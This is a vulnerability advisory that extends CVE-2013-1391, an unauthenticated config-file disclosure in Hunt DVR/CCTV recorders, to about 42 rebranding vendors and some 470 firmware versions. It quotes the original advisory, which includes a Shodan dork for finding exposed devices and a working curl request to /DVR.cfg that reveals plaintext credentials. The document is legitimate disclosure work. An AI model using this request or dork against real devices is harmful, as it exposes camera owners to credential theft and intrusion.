Title:
Multiple DVR/CCTV/IPcam Manufacturers Configuration Disclosure - Original CVE-2013-1391 extended to Hunt, Huntelec plus around 40 vendors customizing Hunt products
References:
ACSA-2013-022
(extends the impacted vendor/product of CVE-2013-1391)
Timeline:
xx Nov 2013 - Vulnerability discovered in more vendors/products than originally stated in CVE-2013-1391
21 Nov 2013 - Vendor notified, fix and disclosure timeline proposed to the vendor (also, as part of ACSA-2013-009/CVE-2013-5652)
22 Nov 2013 - Vendor replies "Hunt is a ODM manufacture , if we hope to do any change. We need to let our customer know. I will let them know it. When we get the response we will let you know our solution."
13 Dec 2013 - Follow-up with the vendor
12 Oct 2014 - Public disclosure
Related references:
ACSA-2013-009
CVE-2013-5652
Author:
Andrei Costin of "FIRMWARE.RE" project
andrei@firmware.re
andrei@andreicostin.com
Vulnerability discovered using "FIRMWARE.RE" platform/service
Vendors (main, white-label):
Hunt (http://www.hunt.com.tw/)
Vendors (customizing/marketing, by firmware code):
SV:
SVAT (http://svat.com)
ES:
http://www.oceancctv.com.tw/mypage.php?id=2
AZ:
http://www.cctvthailand.com/index.php?mo=21&list&hotdownload&p=4
http://hiview.igetweb.com/index.php?mo=21&list&newreleases&p=7
http://webcache.googleusercontent.com/search?q=cache:m-OAI7hvGRwJ:www.hiview.co.th/index.php%3Fmo%3D21%26list%26catid%3D7946+&cd=1&hl=en&ct=clnk&gl=fr&client=ubuntu
LI:
http://www.meritlilin.com/en/support-download.asp?c3#c3
http://www.lilin.tv/downloads
http://www.lilin.co.uk/
http://www.meritlilin.com/en/livedemo.asp
https://www.google.fr/search?client=ubuntu&channel=fs&q="LI2.1.93"
https://www.google.fr/search?client=ubuntu&channel=fs&q=DVR216-LI2.1.93.zip
http://www.generalfiles.biz/download/gs497df0ddh32i0/DVR216.zip.html
Affected firmware:
The list of affected firmwares is attached (470 unique software version, across approx 42 vendors deriving from hunt.com.tw generic/white-label brand)
AM1.1.17
AM1.1.42
AM1.1.45
AM1.1.52
AM1.1.62
AM1.1.67
AM1.1.69
AM1.1.72
AM2.1.75
AZ1.1.17
AZ1.1.20
AZ1.1.24
AZ1.1.26
AZ1.1.29
AZ1.1.45
AZ1.1.50
AZ1.1.61
AZ1.1.67
AZ1.1.68
AZ1.1.70
AZ1.1.80
AZ2.1.71
AZ2.1.72
AZ2.1.76
AZ2.1.77
AZ2.1.78
AZ2.1.81
AZ2.1.92
CO1.1.16
CO1.1.41
CO1.1.52
CO1.1.65
CO1.1.68
D1.1.12
D1.1.15
D1.1.17
D1.1.22
D1.1.28
D1.1.36
D1.1.39
D1.1.43
D1.1.45
D1.1.61
D1.1.62
D1.1.67
D1.1.70
D2.1.71
D2.1.76
ER1.1.22
ER1.1.24
ER1.1.52
ER1.1.54
ER1.1.61
ER2.1.72
ER2.1.74
ER2.1.80
ES1.1.16
ES1.1.17
ES1.1.18
ES1.1.38
ES1.1.40
ES1.1.42
ES1.1.43
ES1.1.45
ES1.1.46
ES1.1.49
ES1.1.51
ES1.1.52
ES1.1.54
ES1.1.55
ES1.1.57
ES1.1.59
ES1.1.61
ES1.1.63
ES1.1.65
ES1.1.67
ES1.1.68
ES1.1.69
ES1.1.70
ES1.1.71
ES1.1.74
ES1.1.75
ES1.1.76
ES1.1.90
ES2.1.71
ES2.1.72
ES2.1.73
ES2.1.74
ES2.1.75
ES2.1.76
ES2.1.77
ES2.1.80
ES2.1.81
ES2.1.90
ES2.1.92
F1.1.23
F1.1.25
F1.1.29
F1.1.30
F1.1.32
F1.1.33
F1.1.35
F1.1.39
F1.1.43
F1.1.45
F1.1.48
F1.1.49
F1.1.52
F1.1.53
F1.1.60
F1.1.63
F1.1.66
F1.1.67
F1.1.69
F1.1.70
F1.1.72
F2.1.71
FO1.1.19
FO1.1.49
FO1.1.69
FO2.1.79
H1.1.27
HM1.1.51
HM1.1.70
HM2.1.72
HM2.1.77
I1.1.14
I1.1.17
I1.1.32
I1.1.35
I1.1.42
I1.1.47
I1.1.60
I1.1.61
I1.1.68
I1.1.74
I2.1.75
I2.1.81
IA2.1.80
IA2.1.81
K1.1.40
K1.1.41
K1.1.45
K1.1.50
K1.1.55
K1.1.60
K1.1.68
K1.1.75
K2.1.80
KB1.1.45
KU1.1.55
KU1.1.75
KU2.1.80
L1.1.42
L1.1.48
L1.1.61
LI1.1.21
LI1.1.22
LI1.1.25
LI1.1.26
LI1.1.27
LI1.1.28
LI1.1.29
LI1.1.30
LI1.1.42
LI1.1.49
LI1.1.51
LI1.1.55
LI1.1.56
LI1.1.57
LI1.1.59
LI1.1.61
LI1.1.63
LI1.1.64
LI1.1.73
LI1.1.74
LI2.1.71
LI2.1.75
LI2.1.76
LI2.1.77
LI2.1.78
LI2.1.80
LI2.1.81
LI2.1.90
LI2.1.93
LW1.1.32
LW2.0.02
LW2.0.03
LW2.0.04
LW2.0.05
LW2.0.06
LW2.0.15
LW3.0.04
LW3.0.05
LW3.0.07
M1.1.48
M1.1.60
M1.1.65
N1.1.49
N1.1.51
N1.1.52
N1.1.57
N1.1.61
N1.1.65
N1.1.69
N1.1.78
N1.1.79
N2.1.79
PE1.1.55
PE1.1.69
PE2.1.77
PR1.1.51
PR1.1.52
PR1.1.54
Q1.1.55
Q1.1.64
QF1.1.62
QF1.1.64
RO1.1.16
RO1.1.17
RO1.1.39
RO1.1.45
RO1.1.55
RO1.1.67
RO2.1.71
S1.1.39
SA1.1.17
SA1.1.18
SA1.1.24
SA1.1.25
SA1.1.28
SA1.1.30
SA1.1.45
SA1.1.48
SA1.1.55
SA1.1.59
SA1.1.61
SA1.1.67
SA1.1.69
SA1.1.70
SA1.1.80
SA1.1.85
SA2.1.81
SG1.1.17
SG1.1.19
SG1.1.28
SG1.1.69
SG2.1.71
SI1.1.38
SI1.1.39
SI1.1.45
SI1.1.54
SV1.1.46
SV1.1.51
SV1.1.52
SV1.1.68
SV1.1.71
SV1.1.74
SV2.1.71
SV2.1.74
SV2.1.81
SV3.1.72
SV3.1.74
TO1.1.17
TO1.1.49
TO1.1.50
TO1.1.52
TO1.1.55
TO1.1.61
TO1.1.69
TO1.1.70
TO1.1.75
TO2.1.71
TO2.1.72
TO2.1.80
TO2.1.90
TY1.1.20
TY1.1.50
TY1.1.70
TY2.1.70
TY2.1.71
TY3.1.75
U1.1.45
U1.1.67
UK1.1.67
UK1.1.74
UK2.1.72
UK2.1.77
V1.1.09
V1.1.12
V1.1.14
V1.1.15
V1.1.16
V1.1.17
V1.1.19
V1.1.20
V1.1.21
V1.1.22
V1.1.22ND
V1.1.23
V1.1.24
V1.1.24ND
V1.1.25
V1.1.26
V1.1.27
V1.1.28
V1.1.28ND
V1.1.29
V1.1.31
V1.1.33
V1.1.35
V1.1.38
V1.1.39
V1.1.40
V1.1.41
V1.1.42
V1.1.43
V1.1.45
V1.1.48
V1.1.49
V1.1.50
V1.1.51
V1.1.52
V1.1.52ND
V1.1.53
V1.1.53ND
V1.1.54
V1.1.54ND
V1.1.55
V1.1.57
V1.1.58
V1.1.60
V1.1.61
V1.1.61ND
V1.1.62
V1.1.65
V1.1.66
V1.1.67
V1.1.68
V1.1.69
V1.1.69D
V1.1.70
V1.1.71
V1.1.72
V1.1.73
V1.1.74
V1.1.75ND
V1.1.77
V1.1.78D
V1.1.80
V1.1.80ND
V1.1.81
V1.1.90
V1.1.90ND
V1.1.92ND
V1.47
V1.48
V1.50
V1.51
V2.0.04
V2.0.15
V2.1.69
V2.1.71
V2.1.71ND
V2.1.72
V2.1.72ND
V2.1.74
V2.1.74ND
V2.1.75
V2.1.75ND
V2.1.77
V2.1.77ND
V2.1.80
V2.1.80ND
V2.1.81
V2.1.81ND
V2.1.83
V2.1.84
V2.1.90
V2.1.90ND
V2.1.92
V2.1.92ND
V3.1.72ND
V3.1.74ND
V3.1.75ND
V3.1.77ND
V3.1.79ND
V3.1.80
V3.1.90
V3.1.90ND
V3.1.92ND
VA1.1.28
VA2.1.79
VY1.1.66ND
VY1.1.71ND
VY1.1.72NDS
VY1.1.73ND
W1.1.39
WT1.1.22
WT1.1.28
WT1.1.45
WT1.1.46
WT1.1.49
WT1.1.52
WT1.1.58
WT1.1.61
WT1.1.62
WT1.1.70
WT2.1.72
WT2.1.75
WT2.1.79
X1.1.100
X1.1.94
Y1.1.07
Y1.1.09
Y1.1.13
Y1.1.14
Y1.1.16
Y1.1.17
Y1.1.18
Y1.1.19
Y1.1.25
Y1.1.35
Y1.1.38
Y1.1.39
Y1.1.40
Y1.1.42
Y1.1.43
Y1.1.45
Y1.1.49
Y1.1.50
Y1.1.52
Y1.1.54
Y1.1.55
Y1.1.60
Y1.1.61
Y1.1.62
Y1.1.65
Y1.1.66
Y1.1.68
Y1.1.69
Y1.1.70
Y1.1.74
Y1.1.75
Y1.1.90
Y2.1.70
Y2.1.71
Y2.1.72
Y2.1.74
Y2.1.75
Y2.1.77
Y2.1.80
Y2.1.81
YP1.1.17
YP1.1.18
YP1.1.32
YP1.1.40
YP1.1.45
YP1.1.47
YP1.1.48
YP1.1.49
YP1.1.50
YP1.1.52
YP1.1.55
YP1.1.66
YP1.1.67
YP1.1.68
YP1.1.73
YP2.1.70
YP2.1.74
Vulnerability details:
From http://packetstormsecurity.com/files/119871/Hunt-CCTV-Credential-Disclosure.html
****************************************************************************
Hunt CCTV (and generics brands) Insufficient Authentication
January 17, 2013 - A. Ramos
-- CVE ID:
CVE-2013-1391 [reserved]
-- Affected Vendors:
Hunt CCTV (http://www.huntcctv.com/)
** generic brands from Hunt **
Capture CCTV (http://www.capturecctv.ca/)
NoVus CCTV (http://www.novuscctv.com/)
Well-Vision Inc (http://well-vision.com/)
-- Affected Models:
DVR-04 / DVR-04CH (HuntCCTV)
DVR-04NC (HuntCCTV)
DVR-08 / DVR-08CH (HuntCCTV)
DVR-08NC (HuntCCTV)
DVR-16 / DVR-16CH (HuntCCTV)
CDR 0410VE (CaptureCCTV-HuntCCTV)
CDR 0820VDE (CaptureCCTV-HuntCCTV)
DR6-704A4H (HuntCCTV)
DR6-708A4H (HuntCCTV)
DR6-7316A4H (HuntCCTV)
DR6-7316A4HL (HuntCCTV)
HDR-04KD (unknown-HuntCCTV)
HDR-08KD (unknown-HuntCCTV)
HV-04RD PRO (Hachi-HuntCCTV)
HV-08RD PRO (Hachi-HuntCCTV)
NV-DVR1204 (NovusSec)
NV-DVR1208 (NovusSec)
NV-DVR1216 (NovusSec)
TW-DVR604 (Well Vision INC Solutions-HuntCCTV)
TW-DVR616 (Well Vision INC Solutions-HuntCCTV)
Shodan dork: Basic realm="DVR" server: httpd -mini
Shodan results: 46890
Vulnerable: >70%
-- Vulnerability Details:
You can get the entire backup config with simple GET. No authentication
required.
All information are in clear text: admin panel, ddns config, ppoe
credentials, misc.
Example:
[aramosf@velouria data]$ curl -v http://x.x.x.x/DVR.cfg | strings |grep -i
USER
* Trying x.x.x.x... connected
* Connected to x.x.x.x (x.x.x.x) port 80 (#0)
> GET /DVR.cfg HTTP/1.1
> User-Agent: curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/
3.13.1.0 zlib/1.2.3 libidn/1.18 libssh2/1.2.2
> Host: x.x.x.x
> Accept: */*
>
< HTTP/1.0 200 Ok
< Server: httpd
< Date: Fri, 17 Jan 2013 05:47:02 GMT
< Cache-Control: no-cache
< Pragma: no-cache
< Expires: 0
< Connection: close
< Content-Type: application/octet-stream
<
USER1_USERNAME=iam
USER1_PASSWORD=sexy
Vulnerable firmware (127 different ones):
- 1.1.10 to 1.1.92
- 1.47 to 1.51
- 2.0.0 to 2.1.93
- 3.0.04 to 3.1.92
-- Disclosure Timeline:
2011-09-?? - Vulnerability discovered
2012-12-20 - Published in the book "Hacker Epico" (
http://www.hackerepico.com)
2013-01-15 - CVE Assigned
2013-01-20 - Vulnerability reported to vendor
2013-01-24 - Vulnerability reported to GDT (Spain)
2013-01-28 - Public disclosure:
http://www.securitybydefault.com/2013/01/12000-grabadores-de-video-expuestos-en.html
--
Alejandro Ramos
www.securitybydefault.com
****************************************************************************
About the author/project:
Firmware.RE is part of the Firmware Genome Project.
Firmware.RE is a free online service that:
- unpacks, scans and analyzes almost any firmware package and facilitates the quick detection of vulnerabilities, backdoors and all kinds of embedded malware.
- facilitates firmware mounting, modification, loading and emulation.
- facilitates firmware vulnerability and backdoor discovery.
- helps secure your embedded and internet-of-things devices.
